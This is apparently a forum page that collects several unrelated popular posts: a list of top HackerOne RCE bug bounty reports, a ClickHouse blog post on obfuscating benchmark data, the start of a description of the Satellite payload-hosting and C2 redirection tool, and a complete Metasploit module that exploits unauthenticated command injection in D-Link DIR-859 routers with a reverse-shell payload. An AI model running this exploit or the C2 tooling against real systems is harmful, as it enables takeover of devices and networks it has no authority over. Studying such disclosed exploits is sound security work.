Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 01/26/20 in all areas

  1. Top 25 RCE Bug Bounty Reports The reports were disclosed through the HackerOne platform and were selected according to their upvotes, bounty, severity level, complexity, and uniqueness. #1 Title: Potential pre-auth RCE on Twitter VPN Company: Twitter Bounty: $20,160 Link: https://hackerone.com/reports/591295 #2 Title: RCE on Steam Client via buffer overflow in Server Info Company: Valve Bounty: $18,000 Link: https://hackerone.com/reports/470520 #3 Title: Struct type confusion RCE Company: Shopify Bounty: $18,000 Link: https://hackerone.com/reports/181879 #4 Title: Malformed .BSP Access Violation in CS:GO can lead to Remote Code Execution Company: Valve Bounty: $12,500 Link: https://hackerone.com/reports/351014 #5 Title: Git flag injection — local file overwrite to remote code execution Company: GitLab Bounty: $12,000 Link: https://hackerone.com/reports/658013 #6 Title: Remote Code Execution on www.semrush.com/my_reports on Logo upload Company: SEMrush Bounty: $10,000 Link: https://hackerone.com/reports/403417 #7 Title: Panorama UI XSS leads to Remote Code Execution via Kick/Disconnect Message Company: Valve Bounty: $9,000 Link: https://hackerone.com/reports/631956 #8 Title: RCE using bash command injection on /system/images (toimitilat.lahitapiola.fi) Company: LocalTapiola Bounty: $6,800 Link: https://hackerone.com/reports/303061 #9 Title: Remote Code Execution at http://tw.corp.ubnt.com Company: Ubiquiti Inc. Bounty: $5,000 Link: https://hackerone.com/reports/269066 #10 Title: Adobe Flash Player Regular Expression UAF Remote Code Execution Vulnerability Company: Flash (IBB) Bounty: $5,000 Link: https://hackerone.com/reports/139879 #11 Title: RCE by command line argument injection to `gm convert` in `/edit/process?a=crop` Company: Imgur Bounty: $5,000 Link: https://hackerone.com/reports/212696 #12 Title: RCE and Complete Server Takeover of http://www.█████.starbucks.com.sg/ Company: Starbucks Bounty: $4,000 Link: https://hackerone.com/reports/502758 #13 Title: [ RCE ] Through stopping the redirect in /admin/* the attacker able to bypass Authentication And Upload Malicious File Company: Mail.ru Bounty: $4,000 Link: https://hackerone.com/reports/683957 #14 Title: Blind SQLi leading to RCE, from Unauthenticated access to a test API Webservice Company: Starbucks Bounty: $4,000 Link: https://hackerone.com/reports/592400 #15 Title: Attention! Remote Code Execution at http://wpt.ec2.shopify.com/ Company: Shopify Bounty: $3,000 Link: https://hackerone.com/reports/73567 #16 Title: Unchecked weapon id in WeaponList message parser on client leads to RCE Company: Valve Bounty: $3,000 Link: https://hackerone.com/reports/513154 #17 Title: Drupal 7 pre auth sql injection and remote code execution Company: The Internet Bug Bounty Program Bounty: $3,000 Link: https://hackerone.com/reports/31756 #18 Title: RCE via ssh:// URIs in multiple VCS Company: The Internet Bug Bounty Program Bounty: $3,000 Link: https://hackerone.com/reports/260005 #19 Title: Remote Code Execution on Git.imgur-dev.com Company: Imgur Bounty: $2,500 Link: https://hackerone.com/reports/206227 #20 Title: GMP Deserialization Type Confusion Vulnerability [MyBB <= 1.8.3 RCE Vulnerability] Company: PHP (IBB) Bounty: $1,500 Link: https://hackerone.com/reports/198734 #21 Title: Old WebKit HTML agent in Template Preview function has multiple known vulnerabilities leading to RCE Company: Lob Bounty: $1,500 Link: https://hackerone.com/reports/520717 #22 Title: Remote code execution using render :inline Company: Ruby on Rails Bounty: $1,500 Link: https://hackerone.com/reports/113928 #23 Title: RCE which may occur due to `ActiveSupport::MessageVerifier` or `ActiveSupport::MessageEncryptor` (especially Active storage) Company: Ruby on Rails Bounty: $1,500 Link: https://hackerone.com/reports/473888 #24 Title: Remote code execution on rubygems.org Company: RubyGems Bounty: $1,500 Link: https://hackerone.com/reports/274990 #25 Title: WordPress SOME bug in plupload.flash.swf leading to RCE Company: Automattic Bounty: $1,337 Link: https://hackerone.com/reports/134738 Bonus: 10 Zero Dollars RCE Reports #1 Bonus Title: Read files on application server, leads to RCE Company: GitLab Bounty: $0 Link: https://hackerone.com/reports/178152 #2 Bonus Title: XXE in DoD website that may lead to RCE Company: U.S. D.o.D. Bounty: $0 Link: https://hackerone.com/reports/227880 #3 Bonus Title: Remote Code Execution (RCE) in a DoD website Company: U.S. D.o.D. Bounty: $0 Link: https://hackerone.com/reports/248116 #4 Bonus Title: Remote Unrestricted file Creation/Deletion and Possible RCE. Company: Twitter Bounty: $0 Link: https://hackerone.com/reports/191884 #5 Bonus Title: RCE on via CVE-2017–10271 Company: U.S. D.o.D. Bounty: $0 Link: https://hackerone.com/reports/576887 #6 Bonus Title: Ability to access all user authentication tokens, leads to RCE Company: GitLab Bounty: $0 Link: https://hackerone.com/reports/158330 #7 Bonus Title: Remote Code Execution via Extract App Plugin Company: Nextcloud Bounty: $0 Link: https://hackerone.com/reports/546753 #8 Bonus Title: Arbitrary File Reading leads to RCE in the Pulse Secure SSL VPN on the https://███ Company: U.S. D.o.D. Bounty: $0 Link: https://hackerone.com/reports/678496 #9 Bonus Title: Remote Code Execution in Rocket.Chat Desktop Company: Rocket.chat Bounty: $0 Link: https://hackerone.com/reports/276031 #10 Bonus Title: [npm-git-publish] RCE via insecure command formatting Company: Node.js third-party modules Bounty: $0 Link: https://hackerone.com/reports/730121 Source
    2 points
  2. https://github.com/wtsxDev/reverse-engineering
    1 point
  3. Linkul tau mai fusese postat de doua ori.
    1 point
  4. https://rstforums.com/forum/search/?q=https://rstforums.com/forum/search/?q=https://github.com/wtsxDev/reverse-engineering
    1 point
  5. D-Link DIR-859 Routers are vulnerable to OS command injection via the UPnP interface. The vulnerability exists in /gena.cgi (function genacgi_main() in /htdocs/cgibin), which is accessible without credentials. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'D-Link DIR-859 Unauthenticated Remote Command Execution', 'Description' => %q{ D-Link DIR-859 Routers are vulnerable to OS command injection via the UPnP interface. The vulnerability exists in /gena.cgi (function genacgi_main() in /htdocs/cgibin), which is accessible without credentials. }, 'Author' => [ 'Miguel Mendez Z., @s1kr10s', # Vulnerability discovery and initial exploit 'Pablo Pollanco P.' # Vulnerability discovery and metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2019-17621' ], [ 'URL', 'https://medium.com/@s1kr10s/d94b47a15104' ] ], 'DisclosureDate' => 'Dec 24 2019', 'Privileged' => true, 'Platform' => 'linux', 'Arch' => ARCH_MIPSBE, 'DefaultOptions' => { 'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp', 'CMDSTAGER::FLAVOR' => 'wget', 'RPORT' => '49152' }, 'Targets' => [ [ 'Automatic', { } ], ], 'CmdStagerFlavor' => %w{ echo wget }, 'DefaultTarget' => 0, )) end def execute_command(cmd, opts) callback_uri = "http://192.168.0." + Rex::Text.rand_text_hex(2).to_i(16).to_s + ":" + Rex::Text.rand_text_hex(4).to_i(16).to_s + "/" + Rex::Text.rand_text_alpha(3..12) begin send_request_raw({ 'uri' => "/gena.cgi?service=`#{cmd}`", 'method' => 'SUBSCRIBE', 'headers' => { 'Callback' => "<#{callback_uri}>", 'NT' => 'upnp:event', 'Timeout' => 'Second-1800', }, }) rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{rhost}:#{rport} - Could not connect to the webservice") end end def exploit execute_cmdstager(linemax: 500) end end # 0day.today [2020-01-24] # Source: 0day.today
    1 point
  6. ClickHouse users already know that its biggest advantage is its high-speed processing of analytical queries. But claims like this need to be confirmed with reliable performance testing. That's what we want to talk about today. We started running tests in 2013, long before the product was available as open source. Back then, just like now, our main concern was data processing speed in Yandex.Metrica. We had been storing that data in ClickHouse since January of 2009. Part of the data had been written to a database starting in 2012, and part was converted from OLAPServer and Metrage (data structures previously used by Yandex.Metrica). For testing, we took the first subset at random from data for 1 billion pageviews. Yandex.Metrica didn't have any queries at that point, so we came up with queries that interested us, using all the possible ways to filter, aggregate, and sort the data. ClickHouse performance was compared with similar systems like Vertica and MonetDB. To avoid bias, testing was performed by an employee who hadn't participated in ClickHouse development, and special cases in the code were not optimized until all the results were obtained. We used the same approach to get a data set for functional testing. After ClickHouse was released as open source in 2016, people began questioning these tests. Shortcomings of tests on private data Our performance tests: Can't be reproduced independently because they use private data that can't be published. Some of the functional tests are not available to external users for the same reason. Need further development. The set of tests needs to be substantially expanded in order to isolate performance changes in individual parts of the system. Don't run on a per-commit basis or for individual pull requests. External developers can't check their code for performance regressions. We could solve these problems by throwing out the old tests and writing new ones based on open data, like flight data for the USA and taxi rides in New York. Or we could use benchmarks like TPC-H, TPC-DS, and Star Schema Benchmark. The disadvantage is that this data is very different from Yandex.Metrica data, and we would rather keep the test queries. Why it's important to use real data Performance should only be tested on real data from a production environment. Let's look at some examples. Example 1 Let's say you fill a database with evenly distributed pseudorandom numbers. Data compression isn't going to work in this case, although data compression is essential to analytical databases. There is no silver bullet solution to the challenge of choosing the right compression algorithm and the right way to integrate it into the system, since data compression requires a compromise between the speed of compression and decompression and the potential compression efficiency. But systems that can't compress data are guaranteed losers. If your tests use evenly distributed pseudorandom numbers, this factor is ignored, and the results will be distorted. Bottom line: Test data must have a realistic compression ratio. I covered optimization of ClickHouse data compression algorithms in a previous post. Example 2 Let's say we are interested in the execution speed of this SQL query: SELECT RegionID, uniq(UserID) AS visitors FROM test.hits GROUP BY RegionID ORDER BY visitors DESC LIMIT 10 This is a typical query for Yandex.Metrica. What affects the processing speed? How GROUP BY is executed. Which data structure is used for calculating the uniq aggregate function. How many different RegionIDs there are and how much RAM each state of the uniq function requires. But another important factor is that the amount of data is distributed unevenly between regions. (It probably follows a power law. I put the distribution on a log-log graph, but I can't say for sure.) If this is the case, it is important that the states of the uniq aggregate function with fewer values use very little memory. When there are a lot of different aggregation keys, every single byte counts. How can we get generated data that has all these properties? The obvious solution is to use real data. Many DBMSs implement the HyperLogLog data structure for an approximation of COUNT(DISTINCT), but none of them work very well because this data structure uses a fixed amount of memory. ClickHouse has a function that uses a combination of three different data structures, depending on the size of the data set. Bottom line: Test data must represent distribution properties of the real data well enough, meaning cardinality (number of distinct values per column) and cross-column cardinality (number of different values counted across several different columns). Example 3 Instead of testing the performance of the ClickHouse DBMS, let's take something simpler, like hash tables. For hash tables, it's essential to choose the right hash function. This is not as important for std::unordered_map, because it's a hash table based on chaining and a prime number is used as the array size. The standard library implementation in GCC and Clang uses a trivial hash function as the default hash function for numeric types. However, std::unordered_map is not the best choice when we are looking for maximum speed. With an open-addressing hash table, we can't just use a standard hash function. Choosing the right hash function becomes the deciding factor. It's easy to find hash table performance tests using random data that don't take the hash functions used into account. There are also plenty of hash function tests that focus on the calculation speed and certain quality criteria, even though they ignore the data structures used. But the fact is that hash tables and HyperLogLog require different hash function quality criteria. You can learn more about this in "How hash tables work in ClickHouse" (presentation in Russian). The information is slightly outdated, since it doesn't cover Swiss Tables Challenge Our goal is to obtain data for testing performance that has the same structure as Yandex.Metrica data with all the properties that are important for benchmarks, but in such a way that there remain no traces of real website users in this data. In other words, the data must be anonymized and still preserve: Compression ratio. Cardinality (the number of distinct values). Mutual cardinality between several different columns. Properties of probability distributions that can be used for data modeling (for example, if we believe that regions are distributed according to a power law, then the exponent — the distribution parameter — should be approximately the same for artificial data and for real data). How can we get a similar compression ratio for the data? If LZ4 is used, substrings in binary data must be repeated at approximately the same distance and the repetitions must be approximately the same length. For ZSTD, entropy per byte must also coincide. The ultimate goal is to create a publicly available tool that anyone can use to anonymize their data sets for publication. This would allow us to debug and test performance on other people's data similar to our production data. We would also like the generated data to be interesting. However, these are very loosely-defined requirements and we aren't planning to write up a formal problem statement or specification for this task. . Possible solutions I don't want to make it sound like this problem is particularly important. It was never actually included in planning and no one had intentions to work on it. I just kept hoping that an idea would come up some day, and suddenly I would be in a good mood and be able to put everything else off until later. Explicit probabilistic models The first idea is to take each column in the table and find a family of probability distributions that models it, then adjust parameters based on the data statistics (model fitting) and use the resulting distribution to generate new data. A pseudorandom number generator with a predefined seed could be used to get a reproducible result. Markov chains could be used for text fields. This is a familiar model that could be implemented effectively. However, it would require a few tricks: We want to preserve the continuity of time series. This means that for some types of data, we need to model the difference between neighboring values, rather than the value itself. To model "joint cardinality" of columns we will also have to explicitly reflect dependencies between columns. For instance, there are usually very few IP addresses per user ID, so to generate an IP address we would use a hash value of the user ID as a seed and also add a small amount of other pseudorandom data. We aren't sure how to express the dependency that the same user frequently visits URLs with matching domains at approximately the same time. All this can be written in a C++ "script" with the distributions and dependencies hard coded. However, Markov models are obtained from a combination of statistics with smoothing and adding noise. I started writing a script like this, but after writing explicit models for ten columns, it became unbearably boring — and the "hits" table in Yandex.Metrica had more than 100 columns way back in 2012. EventTime.day(std::discrete_distribution<>({ 0, 0, 13, 30, 0, 14, 42, 5, 6, 31, 17, 0, 0, 0, 0, 23, 10, ...})(random)); EventTime.hour(std::discrete_distribution<>({ 13, 7, 4, 3, 2, 3, 4, 6, 10, 16, 20, 23, 24, 23, 18, 19, 19, ...})(random)); EventTime.minute(std::uniform_int_distribution<UInt8>(0, 59)(random)); EventTime.second(std::uniform_int_distribution<UInt8>(0, 59)(random)); UInt64 UserID = hash(4, powerLaw(5000, 1.1)); UserID = UserID / 10000000000ULL * 10000000000ULL + static_cast<time_t>(EventTime) + UserID % 1000000; random_with_seed.seed(powerLaw(5000, 1.1)); auto get_random_with_seed = [&]{ return random_with_seed(); }; This approach was a failure. If I had tried harder, maybe the script would be ready by now. Advantages: Conceptual simplicity. Disadvantages: Large amount of work required. The solution only applies to one type of data. And I would prefer a more general solution that can be used for Yandex.Metrica data as well as for obfuscating any other data. In any case, this solution could be improved. Instead of manually selecting models, we could implement a catalog of models and choose the best among them (best fit plus some form of regularization). Or maybe we could use Markov models for all types of fields, not just for text. Dependencies between data could also be extracted automatically. This would require calculating the relative entropy (relative amount of information) between columns. A simpler alternative is to calculate relative cardinalities for each pair of columns (something like "how many different values of A are there on average for a fixed value B"). For instance, this will make it clear that URLDomain fully depends on the URL, and not vice versa. But I rejected this idea as well, because there are too many factors to consider and it would take too long to write. Neural networks As I've already mentioned, this task wasn't high on the priority list — no one was even thinking about trying to solve it. But as luck would have it, our colleague Ivan Puzirevsky was teaching at the Higher School of Economics. He asked me if I had any interesting problems that would work as suitable thesis topics for his students. When I offered him this one, he assured me it had potential. So I handed this challenge off to a nice guy "off the street" Sharif (he did have to sign an NDA to access the data, though). I shared all my ideas with him but emphasized that there were no restrictions on how the problem could be solved, and a good option would be to try approaches that I know nothing about, like using LSTM to generate a text dump of data. This seemed promising after coming across the article The Unreasonable Effectiveness of Recurrent Neural Networks. The first challenge is that we need to generate structured data, not just text. But it wasn't clear whether a recurrent neural network could generate data with the desired structure. There are two ways to solve this. The first solution is to use separate models for generating the structure and the "filler" and only use the neural network for generating values. But this approach was postponed and then never completed. The second solution is to simply generate a TSV dump as text. Experience has shown that some of the rows in the text won't match the structure, but these rows can be thrown out when loading the data. The second challenge is that the recurrent neural network generates a sequence of data, and thus dependencies in data must follow in the order of the sequence. But in our data, the order of columns can potentially be in reverse to dependencies between them. We didn't do anything to resolve this problem. As summer approached, we had the first working Python script that generated data. The data quality seemed decent at first glance: However, we did run into some difficulties: The size of the model is about a gigabyte. We tried to create a model for data that was several gigabytes in size (for a start). The fact that the resulting model is so large raises concerns. Would it be possible to extract the real data that it was trained on? Unlikely. But I don't know much about machine learning and neural networks, and I haven't read this developer's Python code, so how can I be sure? There were several articles published at the time about how to compress neural networks without loss of quality, but it wasn't implemented. On the one hand, this doesn't seem to be a serious problem, since we can opt out of publishing the model and just publish the generated data. On the other hand, if overfitting occurs, the generated data may contain some part of the source data. On a machine with a single CPU, the data generation speed is approximately 100 rows per second. Our goal was to generate at least a billion rows. Calculations showed that this wouldn't be completed before the date of the thesis defense. It didn't make sense to use additional hardware, because the goal was to make a data generation tool that could be used by anyone. Sharif tried to analyze the quality of data by comparing statistics. Among other things, he calculated the frequency of different characters occurring in the source data and in the generated data. The result was stunning: the most frequent characters were Ð and Ñ. Don't worry about Sharif, though. He successfully defended his thesis and then we happily forgot about the whole thing. Mutation of compressed data Let's assume that the problem statement has been reduced to a single point: we need to generate data that has the same compression ratio as the source data, and the data must decompress at the same speed. How can we achieve this? We need to edit compressed data bytes directly! This allows us to change the data without changing the size of the compressed data, plus everything will work fast. I wanted to try out this idea right away, despite the fact that the problem it solves is not the same one we started with. But that's how it always is. So how do we edit a compressed file? Let's say we are only interested in LZ4. LZ4 compressed data is composed of sequences, which in turn are strings of not-compressed bytes (literals), followed by a match copy: Literals (copy the following N bytes as is). Matches with a minimum repeat length of 4 (repeat N bytes that were in the file at a distance of M). Source data: Hello world Hello. Compressed data (arbitrary example): literals 12 "Hello world " match 5 12. In the compressed file, we leave "match" as-is, and change the byte values in "literals". As a result, after decompressing, we get a file in which all repeating sequences at least 4 bytes long are also repeated at the same distance, but they consist of a different set of bytes (basically, the modified file doesn't contain a single byte that was taken from the source file). But how do we change the bytes? The answer isn't obvious, because in addition to the column types, the data also has its own internal, implicit structure that we would like to preserve. For example, text is often stored in UTF-8 encoding, and we want the generated data to also be valid UTF-8. I developed a simple heuristic that involves meeting several criteria: Null bytes and ASCII control characters are kept as-is. Some punctuation characters remains as-is. ASCII is converted to ASCII and for everything else the most significant bit is preserved (or an explicit set of "if" statements is written for different UTF-8 lengths). In one byte class a new value is picked uniformly at random. Fragments like https:// are preserved, otherwise it looks a bit silly. The only caveat to this approach is that the data model is the source data itself, which means it cannot be published. The model is only fit for generating amounts of data no larger than the source. On the contrary, the previous approaches provide models which allow generating data of arbitrary size. Example for a URL: http://ljc.she/kdoqdqwpgafe/klwlpm&qw=962788775I0E7bs7OXeAyAx http://ljc.she/kdoqdqwdffhant.am/wcpoyodjit/cbytjgeoocvdtclac http://ljc.she/kdoqdqwpgafe/klwlpm&qw=962788775I0E7bs7OXe http://ljc.she/kdoqdqwdffhant.am/wcpoyodjit/cbytjgeoocvdtclac http://ljc.she/kdoqdqwdbknvj.s/hmqhpsavon.yf#aortxqdvjja http://ljc.she/kdoqdqw-bknvj.s/hmqhpsavon.yf#aortxqdvjja http://ljc.she/kdoqdqwpdtu-Unu-Rjanjna-bbcohu_qxht http://ljc.she/kdoqdqw-bknvj.s/hmqhpsavon.yf#aortxqdvjja http://ljc.she/kdoqdqwpdtu-Unu-Rjanjna-bbcohu_qxht http://ljc.she/kdoqdqw-bknvj.s/hmqhpsavon.yf#aortxqdvjja http://ljc.she/kdoqdqwpdtu-Unu-Rjanjna-bbcohu-702130 The results were positive and the data was interesting, but something wasn't quite right. The URLs kept the same structure, but in some of them it was too easy to recognize "yandex" or "avito" (a popular marketplace in Russia), so I created a heuristic that swaps some of the bytes around. There were other concerns as well. For example, sensitive information could possibly reside in a FixedString column in binary representation and potentially consists of ASCII control characters and punctuation, which I decided to preserve. However, I didn't take data types into consideration. Another problem is that if a column stores data in the "length, value" format (this is how String columns are stored), how do I ensure that the length remains correct after the mutation? When I tried to fix this, I immediately lost interest. Random permutations Unfortunately, the problem wasn't solved. We performed a few experiments, and it just got worse. The only thing left was to sit around doing nothing and surf the web randomly, since the magic was gone. Luckily, I came across a page thatl expained the algorithm for rendering the death of the main character in the game Wolfenstein 3D. The animation is really well done — the screen fills up with blood. The article explains that this is actually a pseudorandom permutation. A random permutation of a set of elements is a randomly picked bijective (one-to-one) transformation of the set, or a mapping where each and every derived element corresponds to exactly one original element (and vice versa). In other words, it is a way to randomly iterate through all the elements of a data set. And that is exactly the process shown in the picture: each pixel is filled in random order, without any repetition. If we were to just choose a random pixel at each step, it would take a long time to get to the last one. The game uses a very simple algorithm for pseudorandom permutation called linear feedback shift register (LFSR). Similar to pseudorandom number generators, random permutations, or rather their families, can be cryptographically strong when parametrized by a key. This is exactly what we need for data transformation. However, the details might be trickier. For example, cryptographically strong encryption of N bytes to N bytes with a pre-determined key and initialization vector seems like it would work for a pseudorandom permutation of a set of N-byte strings. Indeed, this is a one-to-one transformation and it appears to be random. But if we use the same transformation for all of our data, the result may be susceptible to cryptoanalysis because the same initialization vector and key value are used multiple times. This is similar to the Electronic Codebook mode of operation for a block cipher. What are the possible ways to get a pseudorandom permutation? We can take simple one-to-one transformations and build a complex function that looks random. Here are some of my favorite one-to-one transformations: Multiplication by an odd number (like a large prime number) in two's complement arithmetic. Xorshift: x ^= x >> N. CRC-N, where N is the number of bits in the argument. For example, three multiplications and two xorshift operations are used for the murmurhash finalizer. This operation is a pseudorandom permutation. However, I should point out that hash functions don't have to be one-to-one (even hashes of N bits to N bits). Or here's another interesting example from elementary number theory from Jeff Preshing's website. How can we use pseudorandom permutations to solve our problem? We can use them to transform all numeric fields so we can preserve the cardinalities and mutual cardinalities of all combinations of fields. In other words, COUNT(DISTINCT) will return the same value as before the transformation, and furthermore, with any GROUP BY. It is worth noting that preserving all cardinalities somewhat contradicts our goal of data anonymization. Let's say someone knows that the source data for site sessions contains a user who visited sites from 10 different countries, and they want to find that user in the transformed data. The transformed data also shows that the user visited sites from 10 different countries, which makes it easy to narrow down the search. Even if they find out what the user was transformed into, it won't be very useful, because all the other data has also been transformed, so they won't be able to figure out what sites the user visited or anything else. But these rules can be applied in a chain. For example, if someone knows that the most frequently occurring website in our data is Yandex, with Google in second place, they can just use ranking to determine which transformed site identifiers actually mean Yandex and Google. There's nothing surprising about this, since we are working with an informal problem statement and we are just trying to find a balance between anonymization of data (hiding information) and preserving data properties (disclosure of information). For information about how to approach the data anonymization issue more reliably, read this article. In addition to keeping the original cardinality of values, I also want to keep the order of magnitude of the values. What I mean is that if the source data contained numbers under 10, then I want the transformed numbers to also be small. How can we achieve this? For example, we can divide a set of possible values into size classes and perform permutations within each class separately (maintaining the size classes). The easiest way to do this is to take the nearest power of two or the position of the most significant bit in the number as the size class (these are the same thing). The numbers 0 and 1 will always remain as is. The numbers 2 and 3 will sometimes remain as is (with a probability of 1/2) and will sometimes be swapped (with a probability of 1/2). The set of numbers 1024..2047 will be mapped to one of 1024! (factorial) variants, and so on. For signed numbers, we will keep the sign. It's also doubtful whether we need a one-to-one function. We can probably just use a cryptographically strong hash function. The transformation won't be one-to-one, but the cardinality will be close to the same. However, we do need a cryptographically strong random permutation so that when we define a key and derive a permutation with that key, it would be difficult to restore the original data from the rearranged data without knowing the key. There is one problem: in addition to knowing nothing about neural networks and machine learning, I am also quite ignorant when it comes to cryptography. That leaves just my courage. I was still reading random web pages, and found a link on Hackers News to a discussion on Fabien Sanglard's page. It had a link to a blog post by Redis developer Salvatore Sanfilippo that talked about using a wonderful generic way of getting random permutations, known as a Feistel network. The Feistel network is iterative, consisting of rounds. Each round is a remarkable transformation that allows you to get a one-to-one function from any function. Let's look at how it works. 1.The argument's bits are divided into two halves: arg: xxxxyyyy arg_l: xxxx arg_r: yyyy 2.The right half replaces the left. In its place we put the result of XOR on the initial value of the left half and the result of the function applied to the initial value of the right half, like this: res: yyyyzzzz res_l = yyyy = arg_r res_r = zzzz = arg_l ^ F(arg_r) There is also a claim that if we use a cryptographically strong pseudorandom function for F and apply a Feistel round at least 4 times, we'll get a cryptographically strong pseudorandom permutation. This is like a miracle: we take a function that produces random garbage based on data, insert it into the Feistel network, and we now have a function that produces random garbage based on data, but yet is invertible! The Feistel network is at the heart of several data encryption algorithms. What we're going to do is something like encryption, only it's really bad. There are two reasons for this: We are encrypting individual values independently and in the same way, similar to the Electronic Codebook mode of operation. We are storing information about the order of magnitude (the nearest power of two) and the sign of the value, which means that some values do not change at all. This way we can obfuscate numeric fields while preserving the properties we need. For example, after using LZ4, the compression ratio should remain approximately the same, because the duplicate values in the source data will be repeated in the converted data, and at the same distances from each other. Markov models Text models are used for data compression, predictive input, speech recognition, and random string generation. A text model is a probability distribution of all possible strings. Let's say we have an imaginary probability distribution of the texts of all the books that humanity could ever write. To generate a string, we just take a random value with this distribution and return the resulting string (a random book that humanity could write). But how do we find out the probability distribution of all possible strings? First, this would require too much information. There are 256^10 possible strings that are 10 bytes in length, and it would take quite a lot of memory to explicitly write a table with the probability of each string. Second, we don't have enough statistics to accurately assess the distribution. This is why we use a probability distribution obtained from rough statistics as the text model. For example, we could calculate the probability of each letter occurring in the text, and then generate strings by selecting each next letter with the same probability. This primitive model works, but the strings are still very unnatural. To improve the model slightly, we could also make use of the conditional probability of the letter's occurrence if it is preceded by N specific letters. N is a pre-set constant. Let's say N = 5 and we are calculating the probability of the letter "e" occurring after the letters "compr". This text model is called an Order-N Markov model. P(cata | cat) = 0.8 P(catb | cat) = 0.05 P(catc | cat) = 0.1 ... Let's look at how Markov models work on the website of Hay Kranen. Unlike LSTM neural networks, the models only have enough memory for a small context of fixed-length N, so they generate funny, nonsensical texts. Markov models are also used in primitive methods for generating spam, and the generated texts can be easily distinguished from real ones by counting statistics that don't fit the model. There is one advantage: Markov models work much faster than neural networks, which is exactly what we need. Example for Title (our examples are in Turkish because of the data used): We can calculate statistics from the source data, create a Markov model, and generate new data with it. Note that the model needs smoothing to avoid disclosing information about rare combinations in the source data, but this is not a problem. I use a combination of models from 0 to N. If statistics are insufficient for the model of order N, the N−1 model is used instead. But we still want to preserve the cardinality of data. In other words, if the source data had 123456 unique URL values, the result should have approximately the same number of unique values. We can use a deterministically initialized random number generator to achieve this. The easiest way to do this is to use a hash function and apply it to the original value. In other words, we get a pseudorandom result that is explicitly determined by the original value. Another requirement is that the source data may have many different URLs that start with the same prefix but aren't identical. For example: https://www.yandex.ru/images/cats/?id=xxxxxx. We want the result to also have URLs that all start with the same prefix, but a different one. For example: http://ftp.google.kz/cgi-bin/index.phtml?item=xxxxxx. As a random number generator for generating the next character using a Markov model, we'll take a hash function from a moving window of 8 bytes at the specified position (instead of taking it from the entire string). https://www.yandex.ru/images/cats/?id=12345 ^^^^^^^^ distribution: [aaaa][b][cc][dddd][e][ff][ggggg][h]... hash("images/c") % total_count: ^ http://ftp.google.kz/cg... It turns out to be exactly what we need. Here's the example of page titles: PhotoFunia - Haber7 - Hava mükemment.net Oynamak içinde şaşıracak haber, Oyunu Oynanılmaz • apród.hu kínálatában - RT Arabic PhotoFunia - Kinobar.Net - apród: Ingyenes | Posti PhotoFunia - Peg Perfeo - Castika, Sıradışı Deniz Lokoning Your Code, sire Eminema.tv/ PhotoFunia - TUT.BY - Your Ayakkanın ve Son Dakika Spor, PhotoFunia - big film izle, Del Meireles offilim, Samsung DealeXtreme Değerler NEWSru.com.tv, Smotri.com Mobile yapmak Okey PhotoFunia 5 | Galaxy, gt, după ce anal bilgi yarak Ceza RE050A V-Stranç PhotoFunia :: Miami olacaksını yerel Haberler Oyun Young video PhotoFunia Monstelli'nin En İyi kisa.com.tr –Star Thunder Ekranı PhotoFunia Seks - Politika,Ekonomi,Spor GTA SANAYİ VE PhotoFunia Taker-Rating Star TV Resmi Söylenen Yatağa każdy dzież wierzchnie PhotoFunia TourIndex.Marketime oyunu Oyna Geldolları Mynet Spor,Magazin,Haberler yerel Haberleri ve Solvia, korkusuz Ev SahneTv PhotoFunia todo in the Gratis Perky Parti'nin yapıyı bu fotogram PhotoFunian Dünyasın takımız halles en kulları - TEZ Results After trying four methods, I got so tired of this problem that it was time to just choose something, make it into a usable tool, and announce the solution. I chose the solution that uses random permutations and Markov models parametrized by a key. It is implemented as the clickhouse-obfuscator program, which is very easy to use. The input is a table dump in any supported format (such as CSV or JSONEachRow), and the command line parameters specify the table structure (column names and types) and the secret key (any string, which you can forget immediately after use). The output is the same number of rows of obfuscated data. The program is installed with clickhouse-client, has no dependencies, and works on almost any flavor of Linux. You can apply it to any database dump, not just ClickHouse. For instance, you can generate test data from MySQL or PostgreSQL databases or create development databases that are similar to your production databases. clickhouse-obfuscator \ --seed "$(head -c16 /dev/urandom | base64)" \ --input-format TSV --output-format TSV \ --structure 'CounterID UInt32, URLDomain String, \ URL String, SearchPhrase String, Title String' \ < table.tsv > result.tsv clickhouse-obfuscator --help Of course, everything isn't so cut and dried, because data transformed by this program is almost completely reversible. The question is whether it is possible to perform the reverse transformation without knowing the key. If the transformation used a cryptographic algorithm, this operation would be as difficult as a brute-force search. Although the transformation uses some cryptographic primitives, they are not used in the correct way, and the data is susceptible to certain methods of analysis. To avoid problems, these issues are covered in the documentation for the program (access it using --help). In the end, we transformed the data set we need for functional and performance testing and the Yandex VP of data security approved publication. clickhouse-datasets.s3.yandex.net/hits/tsv/hits_v1.tsv.xz clickhouse-datasets.s3.yandex.net/visits/tsv/visits_v1.tsv.xz Non-Yandex developers use this data for real performance testing when optimizing algorithms inside ClickHouse. Third-party users can provide us with their obfuscated data so that we can make ClickHouse even faster for them. We also released independent open benchmark for hardware and cloud providers on top of this data: clickhouse.yandex/benchmark_hardware.html Source: https://habr.com/en/company/yandex/blog/485096/
    1 point
  7. Satellite is an alternative to Apache and Nginx for payload hosting as well as an alternative to Caddy for C2 traffic redirection. I focused on making the project feature rich, easy-to-use, and reliable. The source and compiled binaries can be found on GitHub. During my internship at SpecterOps this past summer, I had the opportunity to sit next to Lee Christensen who gave the idea to pursue this project. He thought it would be a cool idea if an operator could key their payload downloads based on JA3 signatures. I mocked up a basic web server that would only serve requests only if it matched a predefined JA3 signature using CapacitorSet’s ja3-server package as a model. (For those not familiar with JA3, check out the writeup I contributed to Impersonating JA3 Fingerprints). Once I had the skeleton for payload delivery and HTTP proxying, I took on the task of creating a drop-in replacement for Apache mod_rewrite and Nginx. Satellite now has the ability to filter traffic based on the number of times a payload has been served, the User Agent, JA3 signatures, prerequisite paths (which I’ll show off later) and more. Satellite is not intended to provide the flexibility of mod_rewrite, but instead enable easy payload delivery keying with features almost impossible to replicate in mod_rewrite. Feature Highlights JA3 Payload Delivery Keying Request Order Payload Delivery Keying Configurable Payload Lifetime C2 Traffic Redirection (Proxying) Scriptable Request Keying Easy Credential Capture Global Request Filtering How to Install As previously 